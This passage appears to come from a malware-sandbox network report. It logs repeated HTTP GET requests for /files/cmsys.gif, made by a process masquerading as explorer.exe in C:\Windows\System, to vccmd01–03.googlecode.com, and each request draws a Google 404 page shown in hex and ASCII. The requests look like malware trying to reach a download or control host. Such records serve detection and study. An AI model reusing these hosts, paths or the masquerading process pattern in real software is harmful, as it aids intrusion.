64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:53.313378096 CEST9206INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  25192.168.2.449807142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:57.380153894 CEST9206OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:57.407433033 CEST9208INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:57 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:57.407455921 CEST9208INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  26192.168.2.449809142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:10:59.736529112 CEST9217OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd03.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:10:59.763562918 CEST9218INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:10:59 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:10:59.763583899 CEST9218INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  27192.168.2.449811142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:11:08.292252064 CEST9225OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd01.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:11:08.321787119 CEST9227INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:11:08 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                  Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                  Aug 5, 2022 09:11:08.321803093 CEST9227INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                  Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                  28192.168.2.449812142.250.145.8280C:\Windows\System\explorer.exe
                                                                                  TimestampkBytes transferredDirectionData
                                                                                  Aug 5, 2022 09:11:10.739631891 CEST9228OUTGET /files/cmsys.gif HTTP/1.1
                                                                                  Accept: */*
                                                                                  Accept-Encoding: gzip, deflate
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                  Host: vccmd02.googlecode.com
                                                                                  Connection: Keep-Alive
                                                                                  Aug 5, 2022 09:11:10.766580105 CEST9229INHTTP/1.1 404 Not Found
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Referrer-Policy: no-referrer
                                                                                  Content-Length: 1576
                                                                                  Date: Fri, 05 Aug 2022 07:11:10 GMT
                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 